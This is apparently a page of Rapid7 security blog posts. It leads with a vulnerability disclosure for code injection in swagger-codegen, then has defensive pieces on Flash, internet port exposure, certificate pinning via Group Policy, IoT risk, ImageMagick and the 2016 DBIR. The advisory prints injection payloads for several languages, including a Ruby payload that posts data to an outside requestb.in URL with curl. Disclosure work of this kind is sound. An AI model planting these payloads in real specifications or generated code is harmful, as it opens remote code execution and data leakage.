Swagger-codegen generates client and server code based on a Swagger document in which it trusts to specify inline variables in code unescaped (i.e. unescaped handlebars template variables). The javascript, html, php, ruby and java clients were tested for parameter injection vulnerabilities, and given in example as follows.

javascript (node)

Strings within keys inside the 'paths' object of a Swagger document can be written in the following manner and generate executable NodeJS.

"paths": {        
     "/a');};};return exports;}));console.log('RCE');(function(){}(this,function(){a=function(){b=function(){new Array('": {

 

html

Strings within the 'description' object of a Swagger document can be written with html 'script' tags, and loaded unescaped into a browser.

"info": {        
     "description": "<script>alert(1)</script>",

 

php

Strings within the 'description' object in the definitions section of a Swagger document can inject comments and inline php code.

"definitions": {        
     "d": {            
          "type": "object",            
          "description": "*/ echo system(chr(0x6c).chr(0x73)); /*",

 

ruby

Strings in 'description' and 'title' of a Swagger document can be used in unison to terminate block comments, and inject inline ruby code.

"info": {        
     "description": "=begin",
     "title": "=end `curl -X POST -d \"fizz=buzz\" http://requestb.in/1ftnzfy1`"

java

Strings within keys inside the 'paths' object of a Swagger document can be written in the following manner and generate executable Java.

"paths": {        
     "/a\"; try{java.lang.Runtime.getRuntime().exec(\"ls\");}catch(Exception e){} \"": 

 

Mitigations

Until code generators are patched by their maintainers, users are advised to carefully inspect Swagger documents for language-specific escape sequences.

 

Fixes need to be implemented by those creating code generation tools, in general this does not apply to the swagger documents themselves. Mitigations for all issues include properly escaping parameters before injecting, while taking into account the context the variable(s) are used in inline code creation, and what sanitization efforts are in place to ensure the context of trust for an API specification can maintain a level of code creation free for remote code execution in the known, easily avoidable cases.

 

For example, using double brackets {{, instead of {{{ for handlebars templates will usually prevent many types of injection attacks that involve single or double quote termination, however this will not stop a determined attacker who can inject variables without sanitization logic into multi-line comments, inline code or variables.

 

Mustache templates

  • {{{ code }}} or {{& code}} can be vulnerable in template and sanitization logic
  • {{ code }} can be vulnerable given context language of template (e.g. block quote)

Where to be wary

  • inline code creation from variable
  • single ticks (') and quotes (") unescaped variable injection
  • block comment (initiator & terminator) injection

Where it gets tricky

  • Arbitrary Set delimiter redefinition {{=< >=}} <={{ }}=>
  • Runtime Partial templates {{> partial}}
  • set redefinition with alternate unescape {{=< >=}} <&foo> <={{ }}=>

What to do in general

  • prefer escaped variables always {{foo}}
  • enforce single-line for commented variables // {{foo}}
  • sanitize ' & " in variables before unescaped insertion
  • encode ', in single quoted path strings.
  • encode ", in double quoted path strings

 

It is recommended to consider usage of a sanitization tool such as the OWASP ESAPI.

For the time being, a Github Pull Request is offered here.

Disclosure Timeline

This vulnerability advisory was prepared in accordance with Rapid7's disclosure policy.

  • Tue, Apr 19, 2016: Attempted to contact the vendor and the API team at Swagger.io.
  • Mon, May 09, 2016: Details disclosed to CERT (VU#755216).
  • Thu, Jun 16, 2016: Proposed patch supplied to CERT.
  • Wed, Jun 23, 2016: CVE-2016-5641 assigned by CERT.
  • Thu, Jun 23, 2016: Public disclosure and Metasploit module released.
  • Thu, Jun 23, 2016: Fix offered to swagger-codegen.

 

Future of Swagger

Starting January 1st, 2016, the Swagger Specification has been donated to the Open API Initiative (OAI) and is the foundation of the OpenAPI Specification.  However, the name ‘Swagger’ is still the preferred naming in many a dinner party and dad joke, and was used in this document when referring to an OAS 2.0 specification documentation.  In the typical case, a Swagger document defines a RESTful API.  It implements a subset of the JSON Schema Draft 4.

Tomorrow, Adobe is expected to release a patch for CVE-2016-4171, which fixes a critical vulnerability in Flash 21.0.0.242 that Kaspersky reports is being used in active, targeted campaigns. Generally speaking, these sorts of pre-patch, zero day exploits don't see a lot of widespread use; they're too valuable to burn on random acts of hacking.

 

So, customers shouldn't be any more worried about their Flash installation base today than they were yesterday. However, as I explained almost a year ago, Flash remains a very popular vector for client side attacks, so we recommend you always treat it with caution, and disable it when not needed. This announcement is a great reminder to do that.

 

Since Flash's rise as a popular vector for exploitation, many organizations have taken defensive steps to ensure that Flash has the same click-to-play protections as Java in their desktop space, so those enterprises are in a better position to defend against this and the next Adobe Flash exploit.

 

Our products teams here at Rapid7 are alert to this news, and will be working up solutions in Nexpose and Metasploit to cover this vulnerability, and this blog will be updated when those checks and modules are available. For Nexpose customers in particular, if you’ve opted into Nexpose Now, you can easily create dashboard cards to see all of your java vulnerabilities and the impact that this vulnerability has on your risk. You can also use Adaptive Security to set up a trigger for the vulnerability so that Nexpose automatically launches a scan for it as soon as the check is released.

Today, I'm happy to announce the latest research paper from Rapid7, National Exposure Index: Inferring Internet Security Posture by Country through Port Scanning, by Bob Rudis, Jon Hart, and me, Tod Beardsley. This research takes a look at one of the most foundational components of the internet: the millions and millions of individual services that live on the public IP network. thumbnail_National Exposure Index_cover.jpg

 

When people think about "the internet," they tend to think only of the one or two protocols that the World Wide Web runs on, HTTP and HTTPS. Of course, there are loads of other services, but which are actually in use, and at what rate? How much telnet, SSH, FTP, SMTP, or any of the other protocols that run on TCP/IP is actually in use today, where are they all located, and how much of it is inherently insecure due to running over non-encrypted, cleartext channels?

 

While projects like CAIDA and Shodan perform ongoing telemetry that covers important aspects of the internet, we here at Rapid7 are unaware of any ongoing effort to gauge the general deployment of services on public networks. So, we built our own, using Project Sonar, and we have the tooling now to not only answer these fundamental questions about the nature of the internet and come up with more precise questions for specific lines of inquiry.

 

Can you name the top ten TCP protocols offered on the internet? You probably can guess the top two, but did you know that #7 is telnet? Yep, there are 15 million good old, reliable, usually unencrypted telnet out there, offering shells to anyone who cares to peek in on the cleartext password as it's being used.

 

We found some weird things on the national level, too. For instance, about 75% of the servers offering SMB/CIFS services - a (usually) Microsoft service for file sharing and remote administration for Windows machines -  reside in just six countries: the United States, China, Hong Kong, Belgium, Australia and Poland.

 

It's facts like these that made us realize that we have a fundamental gap in our awareness of the services deployed on the public side of firewalls the world over. This gap, in turn, makes it hard to truly understand what the internet is. So, the paper and the associated data we collected (and will continue to collect) can help us all get an understanding of what makes up one of the most significant technologies in use on Planet Earth.


So, you can score a copy of the paper, full of exciting graphs (and absolutely zero pie charts!) here. Or, if you're of a mind to dig into the data behind those graphs, you can score the summary data here and let us know what is lurking in there that you found surprising, shocking, or sobering.

Situations come up relatively frequently where a specific certificate authority, trusted by browsers and operating systems, acts in a way that the users of those products would consider untrustworthy.

 

In the enterprise, with services exposed to the Internet and employees traveling, working from Wi-Fi and other insecure connections, this is also a very important issue, as the use of some of these less than tasteful certificates could lead to data (and credential!) interception.

 

Fortunately, if you manage Windows systems, you can not only configure the list of trusted authorities, but you can also pin the appropriate one for each service you use.

 

Untrusting Certificate Authorities on Windows via GPO

 

Filippo Valsorda, from Cloudflare, discovered and disclosed that Symantec had created an intermediate certificate authority (CA) for Blue Coat, a company that provides network devices with the ability to inspect SSL/TLS.

 

While there are legitimate uses to these features in the enterprise, such a CA could allow anyone using it to intercept encrypted traffic. This is not the first time, and will probably not be the last time something like this happens, so being ready to revoke certificate authorities is an ability enterprises must have.

 

Filippo also posted a great tutorial on how to revoke it on OS X and now links to Windows instructions but this article also covers pinning and goes into a bit more detail.

 

In this post, we will look at doing it on Windows, in an Active Directory environment.

 

Whitelist Versus Blacklist

 

Windows does allow you to fully configure certificate authorities, which would be ideal from a security perspective, to keep full control of the approved authorities, but which would result in a whitelist approach, requiring additional management effort as it involves replacing the certificates on all systems via GPO, which could risk breaking custom certificates installed for legitimate purposes. This should be a longer term goal, but a blacklist approach can still be used right away.

 

In this case, start by downloading the certificate you want to block as a .crt file.

 

Create A Group Policy Object (GPO)

 

You could use an existing GPO, or create a new one. The important thing to consider is that this will be a computer policy, that should be linked to the OUs where your workstations are located. As with any GPO changes, it is highly recommended to first link and filter this policy to specific testing workstations, considering a mistake could end up breaking SSL/TLS connectivity on workstations.

 

create_gpo.png

 

Edit the GPO, and under Computer Configuration/Windows Settings/Security Settings/Public Key Policies/Untrusted Certificates, right click in the right pane to get the Import option.

 

import.png

 

The first wizard screen has greyed out options, as we are modifying a GPO. On the second one, simply browse to the CRT you downloaded. Ensure the imported certificate gets placed in Untrusted Certificates.

 

At this point, your GPO should look like this, and is ready to block this certificate from the Windows store on all machines where it is deployed.

 

GPO_output.png

 

Pinning Certificate Authorities Via GPO

 

Revoking known bad certificates is one thing, but a very reliable way to ensure bad certificates have no impact on corporate services is to pin those. Pinning essentially configures the client device to only accept known good values for pre-configured SSL/TLS communications.

 

Pinning can be done very granularly, at the certificate/public key level, which would require a lot of management, but it can also be done at the certificate authority level, which is much easier to manage.

 

This would allow us to configure systems to only expect, for example, that communications to the Rapid7 website should use GoDaddy certificates.

 

Rapid7dotcom.png

 

By applying this to the services used by traveling employees, you can ensure that captive portals, hotel and plane Wi-Fi environments or even malicious attacks at the ISP levels would require forging a certificate of that very specific authority, and would prevent the use of another illegitimate yet trusted certificate.

 

Deploy EMET

 

Deployment of EMET has already been covered in our whiteboard Wednesdays briefly, and Microsoft includes great information about it with the installer. EMET must be deployed to the workstations where you wish to pin certificates, and while other EMET mitigations are great for security, they are not covered in this post, where we will focus only on certificate management.

 

Create A GPO For EMET

 

Again, a policy that applies to the appropriate computer objects must be created.

 

EMET itself comes with the appropriate files to create GPOs, located under Program Files\EMET\Deployment\Group Policy Files.

 

1. Copy the ADMX to <SystemDrive>\Windows\PolicyDefinitions

2. Copy the ADML to  <SystemDrive>\Windows\PolicyDefinitions\en-US folder

3. Re-open the GPO Management Console

4. You now have a new set of GPO options available under Computer Configuration\Administrative Template\Windows Components\EMET

5. Enable Certificate Pinning Configuration.

6. In Pinned Sites, list all URLs you want to protect, as well as the name of the rule we will create.

7. In Pinning Rules, use the same rule name, then list the thumbprints (SHA-1) of the certificates to accept, or of their authorities. These rules can get very granular, include expiration dates and more - please read the examples provided by Microsoft if you would like to use such advanced rules. Using the EMET GUI, when starting, can allow you to see the types of rules that can be created with more ease than editing those relatively unfriendly GPOs.

8. In our example, I configure www.rapid7.com to only trusted a SHA-1 thumbprint of OBVIOUSLYNOTAREALTHUMBPRINT. We configured this to be a blocking rule, that expires on Christmas 2020.

 

GPO.png

 

9. If you run the EMET GUI on a system where the GPO is applied, you'll see the new rule being applied, denoted by the icon showing it is coming from a GPO.

 

fromGPO.png

10. If we now browse to Rapid7's website, we get a certificate warning, since the real certificate does not match the fake thumbprint. This is what would happen if a trusted but illegitimate certificate was at play in a man-in-the-middle-attack.

 

certwarning.png

 

11. EMET logs an error to the Event Log, which you should absolutely detect and investigate.

 

event.png

 

12. Repeat this for all important services you use, such as webmail, single sign-on portals, reverse proxies, SaaS providers. Additional protection for social network accounts can also be achieved this way.

 

Warning: Edge does not seem to support this feature yet. You should also look into configuring any alternate browsers in use with similar rules, to obtain better coverage. Again, this is the type of change that should be tested very well before being pushed to a significant amount of workstations, but once done, you will have significantly reduced the chances of a man-in-the-middle attack, and augmented the odds of detecting them.

 

Enjoy your new GPOs!

Suchin Gururangan and I (I'm pretty much there for looks, which is an indicator that jenellis might need prescription lenses) will be speaking at SOURCE Boston this week talking about "doing data science" at "internet scale" and also on how you can get started doing security data science at home or in your organization.  So, come on over to learn more about the unique challenges associated with analyzing "security data", the evolution of IPv4 autonomous systems, where your adversaries may be squirreled away and to find out what information lies hidden in this seemingly innocuous square:

 

all.png

This blog post was written by Bob Rudis, Chief Security Data Scientist and Deral Heiland, Research Lead.

 

Organizations have been participating in the “Internet of Things” (IoT) for years, long before marketers put this new three-letter acronym together. HVAC monitoring/control, badge access, video surveillance systems and more all have had IP connectivity for ages. Today, more systems, processes and (for lack of a more precise word) gizmos are being connected to enterprise networks that fit into this IoT category. Some deliberately; some not.

 

network-782707_960_720.png

 

As organizations continue down the path of adoption of IoT solutions into their environments they are faced with a number of hard questions, and in some ways they may not always know what those questions are. In an attempt to help them avoid falling into a potentially deep and hazardous IoT pit, we’ve put together a few key questions that may help adopters better embrace and secure IoT technology within their organizations.

 

  1. What’s already there?
  2. Do we really need this? (i.e. making the business case for IoT)
  3. How does it connect and communicate (both internally and externally)?
  4. How is it accessed and controlled? (i.e. is there an “app for that” and who has access)
  5. What is the classification of the data? ( i.e. data handled and processed by IoT)
  6. Can we monitor and maintain these IoT devices?
  7. What are the failure modes? (i.e. what breaks if it breaks?)
  8. How does it fit in our threat models? (i.e. what is the impact if compromised?)

 

What’s already there?

This should be the first question. If you can’t answer it right now, you need to work with your teams to inventory what’s out there. By default, these devices are on your network, so you should be able to use your network scanner to find and inventory them. Work with your vendor to ensure they have support for identifying IoT devices.

 

Short of that, work with your procurement teams to see what products have been purchased that may have an IoT component. You should be able to do this by vendor or device name (you may need to look on the itemized purchase orders). Put out a call to action to your department peers to see what they may have deployed without your knowing that may not have shown on the books. Building/campus maintenance and security, app development, and system/app/network architecture departments are good places to start.

 

Do we really need this?

Let’s face it, these “things” are pretty cool and many of them are highly useful. It’s much more efficient being able to deploy cameras or control environmental systems within a building or campus by using modern network protocols and spiffy apps. But, do you really need internet-enabled lights, televisions, and desktop assistants? Yeah, we’re looking at you, Alexa. The novelty effect of IoT should make “why” the first question you ask when considering investing in new “things," quickly followed by “what value does this bring to our organization”. If the answers do not meet the standards your organization has identified, then you should probably curb your IoT enthusiasm for a bit or consider deploying the technology in an isolated environment, with strong access controls to limit or prevent connectivity to the organizations internal systems.

 

There are good business cases for IoT: increased efficiency, cost reduction, service/feature enhancements and more. You may even be in a situation where the “cool factor” is needed to attract new employees or customers. Only you know what meets the threshold of “need."

 

How does it connect and communicate?

There are many aspects to the concept of “communication” in IoT. Does it connect to the LAN, Wi-Fi network and/or 3G/4G for access/control? Does it employ ZigBee, Bluetooth or other low-power and/or mesh network features for distributed or direct communications? Does it use encryption for all, some or any communications? Can it work behind an authenticated proxy server or does it require a direct internet connection? What protocols does it use for communication?

 

Most of these are standard questions on any new technology adoption within an organization. One issue with communications and IoT devices is that their makers tend to not have enterprise deployments in mind and the vast majority require direct internet connections, communicate without encryption and use new, low-power communication technologies to transmit data and control commands in clear text.

 

An advertised feature of many IoT devices is that they store your data in “the cloud." Every question you currently ask about cloud deployments in your organization apply to IoT devices. The cloud connection and internal connection effectively make these “things” a custom data router from your network to some other network. Once you enable that connection, there’s almost nothing stopping it from going the other way. Be wary of sacrificing control for “cool."

 

To get answers to these questions, don’t just trust the manufacturer. Hold your own Proof of Concept deployment in controlled environments and monitor all communications as you change settings. Your regulatory requirements or just internal policy requirements may make the use of many IoT devices impossible without filing an exception and accepting the risks associated with the deployment.

 

How is it accessed and controlled?

IoT is often advertised as a plug-and-play technology. This means the builders tried to remove as much friction as possible from deployments to drive up adoption. This focus on ease-of-use is aimed at casual consumers but many IoT devices have no “enterprise” counterpart. That is, you deploy the same exact devices in the same exact way both “at home” and “at work”. This means many devices will have no password or use only a simple static password versus more detailed or elaborate controls that you are used to in an enterprise. The vast majority have no concept of or support for two-factor or multi-factor authentication. If you think access control is weak, most have no concept of encryption when it comes to any communication channel. If the built-in controls do not conform with your standard requirements consider isolating the “management” side within a separate network - if that’s possible.

 

IoT device access is often done through a mobile app or web (internet) console. How are these mechanisms secured? How is the authentication and/or data secured in transit and on disk? Again, all the cloud service questions you already ask are valid here and you should be wary of relaxing standards without significant benefits.

 

What is the classification of the data?

Another key action to perform when deciding on implementing an IoT solution is to examine the data that is gathered and stored by these devices. By reviewing the data and properly classifying it within defined categories, we can better approach how the data gathered, transmitted, and stored within our environment. This will also help us make better informed decisions when we are faced with IoT technologies that store data in the cloud, or ones that also transmit voice and video information to the cloud. Data classification policy and procedures are important to all businesses to assure that all data is being properly handled within the organization. If you do not have such a practice it is highly recommended that one is developed and that IoT data is included in those policy and procedures.

 

The Department of Energy—in conjunction with Sandia National Labs—has put together a guide to developing a Security Framework for Control System Data Classification and Protection[1] that can help you get started when applying data classification strategies to your own Internet of Things.

 

Can we monitor and maintain these IoT devices?

Unlike servers, routers, switches and firewalls, IoT makers tend to sacrifice manageability for the ability to pack in cool features. The idea of monitoring is a notice when a device fails to phone home or fails to upload data in a preset time interval. Expecting to use SNMP or an ssh connection to gain management telemetry should not be an assumption you make lightly. Verify and test management options before committing to a solution.

 

Patch management is also a critical concern when dealing with IoT technology. In this case we have to consider the full ecosystem of the IoT solution deployed, which could include the control hardware firmware, sensor hardware firmware, server software, and associated mobile application software. Ensuring that all segments are included in a comprehensive patch management solution can be difficult. Based on the IoT technology deployed, there may not be vendor automation patching available. If this is the case then a self-managed solution will need to be implemented.

 

What are the failure modes?

Often overlooked when considering the deployment of any technology but specially with IoT, what happens if the technology fails to operate correctly? Can the business proceed without these services when failure leads to security breakdown or loss of critical data? If so, then it is important that we identify methods to mitigate or reduce the impact of these failures, which may include introducing needed redundancies.

 

If you have no current process in place to analyze failure modes, a great place to start is by using a cyber-oriented failure

mode and effect analysis (FMEA) framework[2] or something like Open FAIR[3] (factor analysis of information risk). Both enable you to quantify outcomes of scenarios and helps combat the urge to “make a gut call” on when considering the possible negative outcomes from IoT deployments.

 

How does it fit within our threat models?

This question needs to be asked in tandem with the failure modes investigation. No system or device sits in isolation on your network, and attackers use the interconnectedness of systems to move laterally and find points of exposure to work from. You should be threat modeling your proposed IoT deployments the same way you do everything else. Look at where it lives, what lives around it and what it does (including the data it transmits and what else it connects to, especially externally). Map out this graph to make sure it fits in within the parameters of your current threat models and expand them only if you absolutely have to.

 

The Internet of Things holds much promise, profit, and progress but with that comes real risk and tangible exposure. We should not be afraid to embrace this technology, but should do so in the safest and most secure ways possible. We hope these questions help you better risk assess IoT you already have and will be adopting.

 


[1] Security Framework for Control System Data Classification and Protection: http://energy.gov/sites/prod/files/oeprod/DocumentsandMedia/21-Security_Framewor k_for_Data_Class.pdf

[2] Christoph Schmittner, Thomas Gruber, Peter Puschner, and Erwin Schoitsch. 2014. Security Application of Failure Mode and Effect Analysis (FMEA). In Proceedings of the 33rd International Conference on Computer Safety, Reliability, and Security - Volume 8666 (SAFECOMP 2014), Andrea Bondavalli and Felicita Di Giandomenico (Eds.), Vol. 8666. Springer-Verlag New York, Inc., New York, NY, USA, 310-325. DOI=http://dx.doi.org/10.1007/978-3-319-10506-2_21

[3] The OpenFAIR body of knowledge: http://www.opengroup.org/subjectareas/security/risk

ImageMagick Vulnerabilities and Exploits

 

On Tuesday, the ImageMagick project posted a vulnerability disclosure notification on their official project forum regarding a vulnerability present in some of its coders. The post details a mitigation strategy that seems effective, based on creating a more restricted policy.xml that governs resource usage by ImageMagick components.

 

Essentially, the ImageMagick vulnerabilities are a combination of a type of confusion vulnerability (where the ImageMagick components do not correctly identify a file format) and a command injection vulnerability (where the filtering mechanisms for guarding against shell escapes are insufficient).

 

How worried should I be?

 

The reason for the public disclosure in the first place is due to the vulnerabilities being exploited already by unknown actors, as reported by Ryan Huber. As predicted by him, published exploits by security researchers targeting the affected components are emerging in short order, including a Metasploit module authored by William Vu and HD Moore.

 

As reported by Dan Goodin, ImageMagick components are common in several web application frameworks, so the threat is fairly serious for any web site operator that is using one of those affected technologies. Since ImageMagick is a component used in several stacks, patches are not universally available yet.

 

What's next?

 

Website operators should immediately determine their use of ImageMagick components in image processing, and implement the referenced policy.xml mitigation while awaiting an updated package that fixes the identified vulnerabilities. Restricting file formats accepted by ImageMagick to just the few that are actually needed, such as PNG, JPG, and GIF, is always a good strategy for those sites where it makes sense to do so. ImageMagick parses hundreds of file formats, which is part of its usefulness.

 

Are any Rapid7 products affected?

No Rapid7 products are affected by this vulnerability.

Verizon has released the 2016 edition of their annual Data Breach Investigations Report (DBIR). Their crack team of researchers have, once again, produced one of the most respected, data-driven reports in cyber security, sifting through submissions from 67 contributors and taking a deep dive into 64,000+ incidents—and nearly 2,300 breaches—to help provide insight on what our adversaries are up to and how successful they've been.

 

The DBIR is a highly anticipated research project and has valuable information for many groups. Policy makers use it to defend legislation; pundits and media use it to crank out scary articles; other researchers and academics take the insights in the report and identify new avenues to explore; and vendors quickly identify product and services areas that are aligned with the major findings. Yet, the data in the report is of paramount import to defenders. With over 80 pages to wade through, we thought it might be helpful to provide some way-points that you could use to navigate through this year's breach and incident map.

 

Bigger is…Better?

 

There are a couple "gotchas" with data submitted to the DBIR team. The first is that a big chunk of data comes from the U.S. public sector where there are mandatory reporting laws, regulations, and requirements. The second is the YUGE number of Unknowns. The DBIR acknowledges this, and it's still valuable to look at the data when there are "knowns" even with this grey (okay, ours is green below) blob of uncertainty in the mix. You can easily find your industry in DBIR Tables 1 & 2 (pages 3 & 4) and if we pivot on that data we can see the distribution of the percentage of incidents that are breaches:

 

2016-verizon-data-breach-report-fig-1-1.png

We've removed the "Public (92)" industry from this set to get a better sense of what's happening across general industries. For the DBIR, there were more submissions of incidents with confirmed data disclosure for smaller organizations than large (i.e. be careful out there SMBs), but there's also a big pile of Unknowns:

 

2016-verizon-data-breach-report-fig-2-1.png

We can also take another, discrete view of this by industry:

 

2016-verizon-data-breach-report-fig-3-1.png

 

(Of note: it seems even the Verizon Data Breach Report has "Unknown Unknowns")

 

As defenders, you should be reading the report with an eye for your industry, size, and other characteristics to help build up your threat profiles and help benchmark your security program. Take your incident to breach ratio (you are using VERIS to record and track everything from anti-virus hits to full on breaches, right?) and compare it to the corresponding industry/size.

 

The Single Most Popular Valuable Chart In The World! (for defenders)

 

When it comes right down to it, you're usually fighting an economic battle with your adversaries. This year's report, Figure 3 (page 7) shows that the motivations are still primarily financial and that Hacking, Malware and Social are the weapons of choice for attackers. We'll dive into that in a bit, but we need to introduce our take on DBIR Figure 8 (page 10) before continuing:

 

2016-verizon-data-breach-report-fig-4-1.png

We smoothed out the rough edges from the 2016 Verizon Data Breach Report to figure to paint a somewhat clearer picture of the overall trends, and used a complex statistical transformation (i.e. subtraction) to just focus on the smoothed gap:

 

2016-verizon-data-breach-report-fig-5-1.png

 

Remember, the DBIR data is a biased sample from the overall population of cyber security incidents and breaches that occur and every statistical transformation introduces more uncertainty along the way. That means your takeaway from "Part Deux" should be "we're not getting any better" vs "THE DETECTION DEFICIT TOPPED 75% FOR THE FIRST TIME IN HISTORY!"

 

So, our adversaries are accomplishing their goals in days or less at an ever-quickening success rate while defenders are just not keeping up at all. Before we can understand what we need to do to reverse these trends, we need to see what the attackers are doing. We took the data from DBIR Figure 6 (page 9) and pulled out the top threat actions for each year, then filtered the result to the areas that match both the major threat action categories and the areas of concern that Rapid7 customers have a keen focus on:

 

2016-verizon-data-breach-report-fig-6-1.pngSome key takeaways:

  • Malware and hacking events dropping C2s are up
  • Key loggers are making a comeback (this may be an artifact of the heavy influence of Dridex in the DBIR data set this year)
  • Malware-based exfiltration is back to previously seen levels
  • Phishing is pretty much holding steady, which is most likely supporting the use of compromised credentials (which is trending up)

 

Endpoint monitoring, kicking up your awareness programs, and watching out for wonky user account behavior would be wise things to prioritize based on this data.

 

Not all Cut-and-Dridex

The Verizon Data Breach Report mentions Dridex 13 times and was very up front about the bias it introduced in the report. So, how can you interpret the data with "DrideRx" prescription lenses? Rapid7's Analytic Response Team notes that Dridex campaigns involve:

 

  • Phishing
  • Endpoint malware drops
  • Establishment of command and control (C2) on the endpoint
  • Harvesting credentials and shipping them back to the C2 servers

 

This means that—at a minimum—the data behind the Data Breach Investigations Report, Figures 6-8 & 15-22, impacted the overall findings and Verizon itself warns about broad interpretations of the Web App Attacks category:

 

"Hundreds of breaches involving social attacks on customers, followed by the Dridex malware and subsequent use of credentials captured by keyloggers, dominate the actions."

 

So, when interpreting the results, keep an eye out for the above components and factor in the Dridex component before tweaking your security program too much in one direction or another.

 

Who has your back?

 

When reading any report, one should always check to make sure the data presented doesn't conflict with itself. One way to add a validation to the above detection deficit is to look at DBIR Figure 9 (page 11) which shows (when known) how breaches were discovered over time. We can simplify this view as well:

 

2016-verizon-data-breach-report-fig-7-1.pngIn the significant majority of cases, defenders have law enforcement agencies (like the FBI in the United States) and other external parties to "thank" for letting them know they've been pwnd. As our figure shows, we stopped being able to watch our own backs half a decade ago and have yet to recover. This should be a wake-up call to defenders to focus on identifying how attackers are getting into their organizations and instrumenting better ways to detect their actions.

 

Are you:

 

  • Identifying critical assets and access points?
  • Monitoring the right things (or anything) on your endpoints?
  • Getting the right logs into the right places for analysis and action?
  • Deploying honeypots to catch activity that should not be happening?

 

If not, these may be things you need to re-prioritize in order to force the attackers to invest more time and resources to accomplish their goals (remember, this is an battle of economics).

 

Are You Feeling Vulnerable?

 

Attackers are continuing to use stolen credentials at an alarming rate and they obtain these credentials through both social engineering and the exploitation of vulnerabilities. Similarly, lateral movement within an organization also relies—in part—on exploiting vulnerabilities. DBIR Figure 13 (page 16) shows that as a group, defenders are staying on top of current and year-minus-one vulnerabilities fairly well:

 

dbirfig13.png

We're still having issues patching or mitigating older vulnerabilities, many of which have tried-and-true exploits that will work juuuust fine. Leaving these attack points exposed is not helping your economic battle with your adversaries, as letting them rely on past R&D means they have more time and opportunity. How can you get the upper-hand?

 

  • Maintain situational awareness when it comes to vulnerabilities (i.e. scan with a plan)
  • Develop a strategy patching with a holistic focus, not just react to "Patch Tuesday"
  • Don't dismiss mitigation. There are legitimate technical and logistic reasons that can make patching difficult. Work on developing a playbook of mitigation strategies you can rely on when these types of vulnerabilities arise.

 

"Threat intelligence" was a noticeably absent topic in the 2016 DBIR, but we feel that it can play a key role when it comes to defending your organization when vulnerabilities are present. Your vuln management, server/app management, and security operations teams should be working in tandem to know where vulnerabilities still exist and to monitor and block malicious activity that is associated with targets that are still vulnerable. This is one of the best ways to utilize all those threat intel feeds you have gathering dust in your SIEM.

 

There and Back Again

 

This post outlined just a few of the interesting markers on your path through the Verizon Data Breach Report. Keep a watchful eye on the Rapid7 Community for more insight into other critical areas of the report and where we can help you address the key issues facing your organization.


(Many thanks to Rapid7's Roy Hodgman and Rebekah Brown for their contributions to this post.)

 

Related Resources:

 

Watch my short take on this year's Verizon Data Breach Investigations Report.

 

DBIR video.png

Join us for a live webcast as we dig deeper into the 2016 Verizon Data Breach Investigations Report findings. Tuesday, May 10 at 2PM ET/11AM PT. Register now!

Filter Blog

By date: By tag: